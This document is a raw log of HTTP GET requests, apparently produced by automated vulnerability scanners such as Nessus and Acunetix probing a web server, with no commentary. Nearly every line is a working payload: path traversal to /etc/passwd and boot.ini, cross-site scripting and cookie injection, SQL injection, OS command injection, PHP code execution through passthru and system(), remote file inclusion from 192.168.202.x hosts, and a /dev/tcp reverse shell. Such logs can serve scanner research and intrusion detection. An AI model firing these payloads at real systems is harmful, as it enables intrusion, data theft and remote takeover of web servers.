GET /top.php?stuff='uname >q36497765 #
GET /h21y8w52.nsf?<script>cross_site_scripting.nasl</script>
GET /ca000001.pl?action=showcart&hop=\"><script>alert('vulnerable')</script>&path=acatalog/
GET /scripts/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; 
GET /javascript/mta.exe
GET /examples/jsp/colors/kernel/loadkernel.php?installpath=/etc/passwd\x00
GET /examples/jsp/cal/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
GET /phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd
GET /cgi-bin/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
GET /examples/jsp/cal/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1
GET /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>esbq
GET /examples/jsp/colors/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
GET /id;1627282494;fp;2;fpid;1/
GET /<img src="javascript:alert(cross_site_scripting.nasl);">.do
GET /bmeun223.exe?<meta http-equiv=set-cookie content="testhhwu=7044">
GET /htbin/windmail.exe
GET /<script>document.cookie="testrluj=1420;"</script>
GET /javascript/.passwd.jpg
GET /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/ghl9il?\x00
GET /examples/jsp/jsp2/el/search=<script>alert('xss')</script>
GET /javascript/signer.exe
GET /help.php?q="&del\x0bq26193259&rem\x0b
GET /c'hoario\xc3\xb9/
GET /main.php?logout="&del\x0cq31768299&rem\x0c
GET /\xd0\x97\xd0\xb4\xd0\xbe\xd1\x80\xd0\xbe\xd0\xb2'\xd1\x8f/
GET /themes/modern/user_style.php?user_colors[bg_color]="</style><script>alert(411136083423)</script>
GET /nyjgaorz.mscgi?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /cgi-bin/index.php?op=default&date=200607' union select 1,501184215,1,1,1,1,1,1,1,1--&blogid=1
GET /scripts/cfooter.php3
GET /en-us/dda2qr7j.fts?<script>cross_site_scripting.nasl</script>
GET /?<meta http-equiv=set-cookie content="testpokn=7494">
GET /169okeyj.jspa?<meta http-equiv=set-cookie content="testxeoi=3573">
GET /j734qobz.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/error/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
GET /post.asp?method=topic&forum_id=1&cat_id=1&type=wvs-xss-magic-string-410025568136
GET /ows-bin/windmail.exe
GET /manager/secure.php?cfgprogdir=/etc/passwd\x00
GET /debug/showproc?proc===<script>alert('vulnerable');</script>
GET /<script>document.cookie="testnvxc=4301;"</script>
GET /cacti/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331905098')</script>
GET /scripts/comersus_customerregistrationform.asp
GET /cgi-bin/search.pl?form=../../../../../../etc/passwd\x00
GET /help.php?q='uname >q23433168 #
GET /u8yiqilu.jsp?<meta http-equiv=set-cookie content="testswjp=6010">
GET /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1376526276--
GET /core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
GET /xsqln7eb.aspx?<meta http-equiv=set-cookie content="testpcbb=9254">
GET /u8yiqilu.dll?<script>document.cookie="testswjp=6010;"</script>
GET /5o9zq43e.cfm?<script>cross_site_scripting.nasl</script>
GET /manager/cgi/tseekdir.cgi?location=/etc/passwd\x00
GET /qhvu0pdg.fts?<meta http-equiv=set-cookie content="testchuc=2100">
GET /scripts/lsg2.cgi
GET /1r8cfrlf.exe?<script>document.cookie="testydan=5106;"</script>
GET /scripts/misc/audio.php?recording=../version.inc
GET /javascript/.passwd.php3
GET /<script>cross_site_scripting.nasl</script>.idc
GET /learnvbscript/
GET /main.php?logout="\x0duname #
GET /recordings/usrdetails.php?sgnuptype=csaleid<script>nessus</script>
GET /javascript/emea.exe
GET /8t9v8k7x.exe?<script>document.cookie="testhvje=9403;"</script>
GET /examples/jsp/error/include/error/autherror.cfm?errorcode=1&ftvar_linkp="></a><script>alert('fusetalk_mult_xss.nasl')</script><a href="
GET /en-us/oie504mr.jspa?<meta http-equiv=set-cookie content="testtpby=7052">
GET /examples/jsp/colors/bb-hostsvc.sh?hostsvc=../../../../../etc/passwd
GET /cgi-bin/type.asp?itype='duware_itype_sql_injection.nasl
GET /help.php?q="del q66737251 #
GET /dslpwt15.fts?<script>document.cookie="testtkio=5454;"</script>
GET /lsoix5h3.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /chef's_knives/
GET /starnet/addons/slideshow_full.php?album_name='288150554
GET /examples/jsp/num/index.php?id='union/**/select/**/0,0,1369222205,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
GET /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/tzhfyzkbomspvm??
GET /mpcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html
GET /main.php?logout="rm q61955456&rem 
GET /scripts/w04ukbv54ixz.cfm
GET /postscriptbarcode/
GET /javascript/htpasswd.exe
GET /javascript/mod.exe
GET /containsscript/
GET /help.php?q=;del q94314237 #
GET /scripts/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
GET /tera patrick - farmer's daughter/
GET /cgi-sys/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /bxnyrhmh.cgi?<script>document.cookie="testmjct=1867;"</script>
GET /scripting languages/
GET /cgi-local/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /bxnyrhmh.cfc?<script>document.cookie="testmjct=1867;"</script>
GET /javascript/warez.exe
GET /scs86g1p.cfm?<meta http-equiv=set-cookie content="testquyx=2820">
GET /scripts/search.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??
GET /tuwjta1w.x?<script>document.cookie="testpokn=7494;"</script>
GET /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.118:8080/ghl9il?
GET /cacti/javascript.php?abs_path=/etc/passwd\x00
GET /en-us/n9xlumt5.x?<script>cross_site_scripting.nasl</script>
GET /bb-hist.sh?histfile=../../../../../etc/passwd
GET /cgi-bin/view_user.php?list=1&letter=&sort_by='select
GET /<script>document.cookie="testggad=2000;"</script>
GET /scripts/readme.txt
GET /ybz5rz7a.pl?<script>document.cookie="testsbvw=6289;"</script>
GET /javascript/backup.exe
GET /javascript/htpasswd.cgi
GET /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1;/bin/id
GET /rv98iwjp.php?<script>cross_site_scripting.nasl</script>
GET /scripts/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script
GET /cgi-bin/starnet/addons/slideshow_full.php?album_name='401935065
GET /y8pmygrp.exe?<script>cross_site_scripting.nasl</script>
GET /top.php?stuff=';uname >q64815511 #
GET /xfkun1ku.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/checkbox/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>
GET /oie504mr.cfc?<meta http-equiv=set-cookie content="testtpby=7052">
GET /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
GET /manager/index.php?selskin=../inc/boxleft.inc\x00&xposbox[l][]=/etc/passwd\x00
GET /iktok2bw.cfm?<script>cross_site_scripting.nasl</script>
GET /help.php?q=del;q81588837&rem;
GET /en-us/dda2qr7j.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /javascript/~eric.exe
GET /scripts/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini
GET /cgi-914/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe
GET /manager/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@
GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script>
GET /cgi-bin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00
GET /read.php?pagenum_rsread=1&totalrows_rsread=<script>alert('wvs-xss-magic-string-414685599129')</script>
GET /help.php?q='rm\x09q87915929\x09#
GET /recordings/calendar.php?serverpath=/etc/passwd\x00
GET /javascript/hardcore.exe
GET /examples/servlets/servlet/ovlaunch.exe
GET /d765w06j.cfm?<script>cross_site_scripting.nasl</script>
GET /javascript/scripts.exe
GET /i686v90l.cgi?<script>document.cookie="testfutf=1550;"</script>
GET /ywaxntrx.do?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /phpmyadmin/doc/index.php?s=/etc/passwd\x00
GET /scriptssearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
GET /scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=mbt7mplpoxxxq5dko
GET /javascript/program files.exe
GET /manager/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl
GET /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
GET /l4fz1dqw.nsf?<script>cross_site_scripting.nasl</script>
GET /if69ddo1.php3?<meta http-equiv=set-cookie content="testiabz=5220">
GET /main.php?stuff="&ping\xa0-w\xa07000\xa0-n\xa01\xa01.2.3.4&rem\xa0
GET /top.php?stuff=;sleep 7 #
GET /?<script>document.cookie="testqppc=8767;"</script>
GET /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1
GET /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --
GET /main.php?logout=ver,>q12148819&rem,
GET /ny1b3qq4.x?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /main.php?stuff='&sleep\x0910\x09#
GET /scripts/eezuu7xc7ge3.php3
GET /ovcgi/webappmon.exe?ins=nowait&sel=localhost&act=ping
GET /7uz3ok60.htm?<script>cross_site_scripting.nasl</script>
GET /top.php?stuff="sleep\x099\x09#
GET /scripts/index.php?board=nonexistant1465558133
GET /d44uk9h2.exe?<script>document.cookie="testmybc=2088;"</script>
GET /index.php?include_files[]=&include_files[query_string]=/etc/passwd
GET /awstatstotals.php?sort={${phpinfo()}}{${exit()}}
GET /help.php?q=ping;-w;11000;-n;1;1.2.3.4|rem;
GET /tukodz3j.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1164366855--
GET /ht8pn8uq.idc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /yver8r9o.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /cgi-bin/starnet/addons/slideshow_full.php?album_name='1273136253
GET /examples/jsp/checkbox/login.php?user="><script>alert('pubcookie_xss.nasl');</script>
GET /qhvu0pdg.dll?<meta http-equiv=set-cookie content="testchuc=2100">
GET /javascript/webbbs.exe
GET /<meta http-equiv=set-cookie content="testjvvf=7721">
GET /boilerplate.asp?nfuse_template=.../.../.../.../.../.../.../.../.../boot.ini&nfuse_currentfolder=/
GET /scripts/vhost.php?action=logout&time=1331919067
GET /examples/jsp/cal/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00
GET /bzuf9ozq.pl?<script>cross_site_scripting.nasl</script>
GET /cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd\x00
GET /interface/login/login_frame.php?site=<script>alert(owasp zap);</script> and 1=1
GET /cgi-bin/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>
GET /scripts/default.asp
GET /examples/jsp/num/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
GET /oie504mr.htm?<script>document.cookie="testtpby=7052;"</script>
GET /examples/jsp/jsp2/jspx/activatemember?activatecode=&member="><script>alert('mvnforum_activatemember_xss.nasl')</script>
GET /en-us/account/workarea/contentdesigner/ekformsiframe.aspx?id="><script>alert('nessus')</script>
GET /subscriptionservices/
GET /scripts/index.php?getapplication=register&checknum=1&args=null
GET /vjbrrppi.fts?<script>cross_site_scripting.nasl</script>
GET /cacti/download.php?language=/etc/passwd\x00
GET /phpmyadmin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
GET /phpmyadmin/view_user.php?list=1&letter=&sort_by='select
GET /javascript/debug.exe
GET /scripts/udblphlq4nln.sh
GET /chief's message on violence against women/
GET /cacti/js/vendors.php?file=../../../../../../../../../../etc/passwd\x00nessus.js
GET /scripts/qg9h0c0svvat.shtml
GET /examples/jsp/jsp2/jspx/view_user.php?list=1&letter=&sort_by='select
GET /cgi-bin/perl.exe?-v
GET /projects/1/repository/annotate?rev=`0<&186-;exec 186<>/dev/tcp/192.168.202.118/17246;sh <&186 >&186 2>&186`
GET /ka'roo/
	<script>document.cookie="testrluj=1420;"</script>
GET /javascript/maestro.exe
GET /top.php?stuff='&sleep 9 #
GET /cacti/setcookie.php?u=../../../../../../../../../../../../etc/passwd\x00&plugin=pblang_mult_flaws.nasl
GET /javascript/vendors.exe
GET /scripts/tree.php
GET /subscriptions.yml
GET /scripts/4rzefq7dsowk.pl
GET /help.php?q="\x0auname\x09>q72938489\x09#
GET /pwcgi/smpwservicescgi.exe?target=http://www.nessus.org
GET /javascript/bfc.exe
GET /cgi-bin/rss.php?blogid=1&profile=../../config/config.properties.php\x00
GET /cacti/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd
GET /snmx-cgi/fxm.exe
GET /descriptious/
GET /main.php?stuff="ping\x0b-w\x0b11000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
GET /manager/lang/index.php?file=/etc/passwd
GET /cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini\x00board=board_1
GET /o35zot2r.cfm?<script>cross_site_scripting.nasl</script>
GET /scripts/inc/pipe.php?hcl_path=http://xxxxxx./
GET /prescription-ultram/
GET /t7tm4m0b.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /phpmyadmin/index.php?op=default&date=200607' union select 1,1265182078,1,1,1,1,1,1,1,1--&blogid=1
GET /en-us/33y9gcqq.jspa?<meta http-equiv=set-cookie content="testnvxc=4301">
GET /ao22ww7y.cfm?<script>document.cookie="testqppc=8767;"</script>
GET /top.php?stuff=&ver\x0b>q21316317&rem\x0b
GET /6dlc2zm9.asp?<script>document.cookie="testqpux=4016;"</script>
GET /scripts_help/
GET /feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1
GET /iajtej82.dll?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /main.php?logout="|ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
GET /javascript/.passwd.db
GET /rpxyx07v.do?<meta http-equiv=set-cookie content="testbnli=1975">
GET /o35zot2r.exe?<script>cross_site_scripting.nasl</script>
GET /scriptsfaq.php?skin=../../admin/manager&tplpath=admin
GET /ygkjkngd.cfc?<script>document.cookie="testnago=4518;"</script>
GET /unix-scripts/
GET /d44uk9h2.exe?<meta http-equiv=set-cookie content="testmybc=2088">
GET /top.php?stuff=&rm;q25243259&rem;
GET /<meta http-equiv=set-cookie content="testqppc=8767">
GET /cgi-bin/sawmill6cl.exe?ho+{complete_version}
GET /scriptaculous/
GET /t7tm4m0b.php3?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /javascript/recorder.exe
GET /scripts/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
GET /scripts/rx9ysf2iwv4j.cfm
GET /cgi-bin/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>
GET /scs86g1p.aspx?<meta http-equiv=set-cookie content="testquyx=2820">
GET /bxnyrhmh.dll?<meta http-equiv=set-cookie content="testmjct=1867">
GET /examples/jsp/colors/index.php?show=../../../../../../../../../../../etc/passwd\x00
GET /zuihld5m.html?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /l13b77e5.nsf?<script>document.cookie="testjvvf=7721;"</script>
GET /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/cgeqvnsxdv.sh'); function v
GET /cgi-binsearch-results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
GET /top.php?stuff=';uname >q38627655 #
GET /examples/jsp/sessions/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; 
GET /top.php?stuff="&rm\x0cq55426988&rem\x0c
GET /javascript/traces.exe
GET /0qhcnefz.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /xampp/phonebook.php?lastname=',acunetix())/*&firstname=1
GET /iv5vkgam.php?<meta http-equiv=set-cookie content="testfosd=94">
GET /igtf0zon.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /en-us/oie504mr.dll?<meta http-equiv=set-cookie content="testtpby=7052">
GET /bzuf9ozq.kspx?<script>cross_site_scripting.nasl</script>
GET /recordings/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd
GET /help.php?q="&ver&rem 
GET /169okeyj.html?<meta http-equiv=set-cookie content="testxeoi=3573">
GET /openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>
GET /administrator/gallery/navigation.php?directory=\"<script>alert(document.cookie)</script>
GET /en-us/h5sc3gxy.nsf?<script>cross_site_scripting.nasl</script>
GET /cacti/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd
GET /en-us/dda2qr7j.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/num/pfdispaly.cgi?../../../../../../etc/passwd
GET /smpwservicescgi.exe
GET /javascript/feeds.exe
GET /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/pcousamoyu"
GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
GET /i7prbs22.cgi?<meta http-equiv=set-cookie content="testjnre=7328">
GET /b5xdqgz2.do?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /examples/jsp/checkbox/admin/admin.php?sid='
GET /nmw0do67.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /scripts/_xuzlr7swn95.php3
GET /ghswfouu.cfc?<script>document.cookie="testsqmm=5713;"</script>
GET /cgi-binsearch_results.dot?search_query=nessus"><script>alert('dotcms_search_query_xss.nasl')</script>/
GET /examples/jsp/checkbox/rot13sj.cgi?/etc/passwd
GET /scripts/gwweb.exe?help=bad-request
GET /cgi/query?mss=../config
GET /t7tm4m0b.nsf?<script>cross_site_scripting.nasl</script>
GET /superduperdescription/
GET /manager/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
GET /javascript/bank.exe
GET /3hlysl2x.cfc?<script>document.cookie="testgjbe=8505;"</script>
GET /iktok2bw.cfc?<script>cross_site_scripting.nasl</script>
GET /cacti/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
GET /htbin/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /examples/jsp/sessions/help.php?section='qualiteam_xcart_sql_xss.nasl
GET /606wkcop.php?<script>cross_site_scripting.nasl</script>
GET /examples/servlets/servlet/admin/admin.php?sid=0'
GET /cgi-bin/index.php?src=1&_common=1&time=1331919011&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00
GET /include/default_header.php?script_path=http://192.168.202.118:8080/tzhfyzkbomspvm?
GET /server.pt?open=space&name=";}</script><script>alert('plumtree_name_xss.nasl')</script>
GET /7u1pb2xi.html?<meta http-equiv=set-cookie content="testlwwz=718">
GET /examples/servlets/servlet/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor
GET /javascript/foo.exe
GET /scripts/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904208')</script>
GET /fcgi-bin/fileseek.cgi?foot=&head=;cat /etc/passwd|
GET /eg2u8pbv.htm?<script>cross_site_scripting.nasl</script>
GET /help.php?q="&del\x0cq93118475&rem\x0c
GET /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/zffcwqffhn0;'); function v
GET /javascript/loading.exe
GET /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\x00
GET /cgi-bin/www/delivery/ac.php?bannerid=-1331904183+or+1=1+--+';passthru(base64_decode($_server[http_nessus_0oywsnwb]));die;/*
GET /cwmail.exe
GET /main.php?stuff=;del q92696358 #
GET /scripts/ws_ftp.ini
GET /x2gyorli.do?<script>document.cookie="testwhac=3130;"</script>
GET /9o6g5vkn.cfc?<script>cross_site_scripting.nasl</script>
GET /templates/admin/login_form.php?msg_login=<script>alert("force_xss")</script>
GET /scripts/sendcard.php?view=1&id='sendcard_sql.nasl
GET /msadm/domain/index.php3?account_name=\"><script>alert('vulnerable')</script>
GET /examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
GET /jw64yq8u.aspx?<meta http-equiv=set-cookie content="testylfu=1313">
GET /zv8tv7h8.php3?<meta http-equiv=set-cookie content="testcqwz=9752">
GET /javascript/.htaccess///skipfish.invalid/;?
GET /index.php?_language=../../../../../../../../../../etc/passwd\x00
GET /m4kkjf8l.dll?<meta http-equiv=set-cookie content="testyglc=8988">
GET /main.php?logout=;rm\x09q14218261\x09#
GET /scripts/?cmd=config
GET /cacti/simple/view_page?mv_arg=|cat /etc/passwd|
	../../../../../../../../../../etc/passw*
GET /cgi-bin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00|
GET /en-us/account/whois.cgi?action=load&whois=;id
GET /cgi-bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332009305',null,null,null,null --
	fi?/etc/passwd
GET /top.php?stuff=1 '" -- 
GET /en-us/<script>cross_site_scripting.nasl</script>.php
GET /ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd
GET /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/zz5thkvtmlgl?\x00
GET /cgi-bin/index.php?id=_pb9wansu9'
GET /cgi-bin/dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0
GET /sys/code/box.inc.php?config["sipssys"]=http://192.168.202.118:8080/moclyxlwqyfjnp?
GET /recordings/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00
GET /main.php?logout='&uname >q16695623 #
GET /adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
GET /javascript/.passwd.py
GET /cgi-bin/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&"
GET /help.php?q=\x0auname\x09>q27637243\x09#
GET /javascript/mark.exe
GET /bxnyrhmh.php?<script>document.cookie="testmjct=1867;"</script>
GET /news.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??
GET /examples/jsp/checkbox/faxsurvey?cat /etc/passwd
GET /0z575z74.do?<meta http-equiv=set-cookie content="testuhsv=9753">
GET /s7qus4g3.x?<script>cross_site_scripting.nasl</script>
GET /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd\x00
GET /main.php?logout="rm;q97754931&rem;
GET /qb2xy9aw.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /ihd231-xss/
GET /examples/jsp/colors/detail.asp?nchannel='1
GET /ddoworrl.cfc?<script>document.cookie="testvlau=8517;"</script>
GET /en-us/s7qus4g3.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /hrttz9fj.php3?<meta http-equiv=set-cookie content="testtbjy=7334">
GET /javascript/developers.exe
GET /javascript/bio.exe
GET /phpmyadmin/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
GET /b5xdqgz2.php?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /phpmyadmin/documentation.html?phpmyadmin="><img src=1 onerror=javascript:alert(205)>
GET /nuh3zirz.kspx?<script>cross_site_scripting.nasl</script>
GET /n9xlumt5.pl?<script>cross_site_scripting.nasl</script>
GET /fmnveedu.htm?<script>document.cookie="testgfbr=7014;"</script>
GET /daddy's little princess - scene 2/
GET //<body><script src=http://www.example.com/test?rnd=q91324775></script>
GET /scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://cirt.net/rfiinc.txt?
GET /jdx255ea.fts?<meta http-equiv=set-cookie content="testziyq=5055">
GET /examples/servlets/servlet/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00
GET /examples/jsp/error/wordtrans.php?command=show_desc&advanced=1";id; true "
GET /scripts/bpk_bsfe_4vq.html
GET /scripts/cmslogin.aspx
GET /cgi-915/sensepost.exe?/c+dir
GET /cgi-local/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
GET /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/swgnhpydbq0t?\x00
GET /<script>cross_site_scripting.nasl</script>.exe
GET /javascript/purchasing.exe
GET /piranha/secure/passwd.php3
GET /help.php?q=ver\x09>q72339979&rem\x09
GET /main.php?stuff="\x0auname #
GET /ap58k3ci.cgi?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /dda2qr7j.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- 
GET /ygkjkngd.cgi?<meta http-equiv=set-cookie content="testnago=4518">
GET /examples/jsp/colors/search.cgi?..\..\..\..\..\..\winnt\win.ini
GET /top.php?stuff="\x0arm\x09q52122221\x09#
GET /um7xpn15.fts?<meta http-equiv=set-cookie content="testotoy=6142">
GET /en-us/fo564rei.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /admin/news.admin.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls
GET /javascript/to.exe
GET /m4kkjf8l.exe?<meta http-equiv=set-cookie content="testyglc=8988">
GET /scripts/gdxlwjnlsr6i.php3
GET /eei78ore.cgi?<script>cross_site_scripting.nasl</script>
GET /examples/jsp/num/index.php?page=/etc/passwd\x00
GET /5qnlm5z2.dll?<meta http-equiv=set-cookie content="testsixi=8451">
GET /fcgi-bin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
GET /scripts/kfzqb5x87lvq.php3
GET /b4vng02k.asp?<script>document.cookie="testtrlh=3672;"</script>
GET /scripts/item.fts?href="><script>alert("ftgate_44002.nasl")</script>;
GET /scripts/test11.asp
GET /main.php?stuff="\x0adel\x09q74494385\x09#
GET /?<script>document.cookie="testwldz=3506;"</script>
GET /en-us/account/index.php?id='
GET /cgi-915/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|'
GET /phpmyadmin/htsearch?exclude=`/etc/passwd`
GET /fc9t54l7.jsp?<meta http-equiv=set-cookie content="testggad=2000">
GET /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
GET /admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/moclyxlwqyfjnp?
GET /examples/jsp/jsp2/jspx/starnet/addons/slideshow_full.php?album_name='2005084173
GET /javascript/benefits.exe
GET /hrttz9fj.exe?<meta http-equiv=set-cookie content="testtbjy=7334">
GET /top.php?stuff=&ver\xa0>q92247843&rem\xa0
GET /scripts/kernel/loadkernel.php?installpath=/etc/passwd\x00
GET /h21y8w52.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
	ftp://192.168.24.253/*<apache_mod_proxy_ftp_glob_xss.nasl>
GET /l752x1ry.kspx?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /search.jsp?q=%"<script>alert(1331909235)</script>
GET /www/delivery/ac.php?bannerid=-1332009302+or+1=1+--+';passthru(base64_decode($_server[http_nessus_dllvu4k6]));die;/*
GET /en-us/account/index.php?id='union/**/select/**/0,0,1647791366,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--
GET /examples/servlets/servlet/includes/converter.inc.php?include_path=/etc/passwd\x00
GET /help.php?q='sleep 8 #
GET /iktok2bw.fts?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /javascript/~ftp.exe
GET /sprotectlinux/showpage.cgi?page=../html/splx_main.htm
GET /help.php?q="&ping -w 8000 -n 1 1.2.3.4&rem 
GET /emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
GET /javascript/document.bat
GET /static//\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xae\xc0\xaeetc/passwd
GET /6dlc2zm9.do?<script>document.cookie="testqpux=4016;"</script>
GET /base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331919174')</script>
GET /ju0u7kfo.jsp?<script>cross_site_scripting.nasl</script>
GET /examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee6~
	<script>document.cookie="testjvvf=7721;"</script>
GET /egaet53a.jspa?<img src="javascript:alert(cross_site_scripting.nasl);">
GET /top.php?stuff=ver;>q99348313&rem;
GET /recordings/pmwiki.php?globals[farmd]=/etc/passwd\x00
GET /examples/jsp/error/pfdispaly.cgi?../../../../../../etc/passwd
GET /bin/a1disp3.cgi?../../../../../../../../../../etc/passwd
GET /ewc3rz1l.idc?<meta http-equiv=set-cookie content="testkgqo=204">
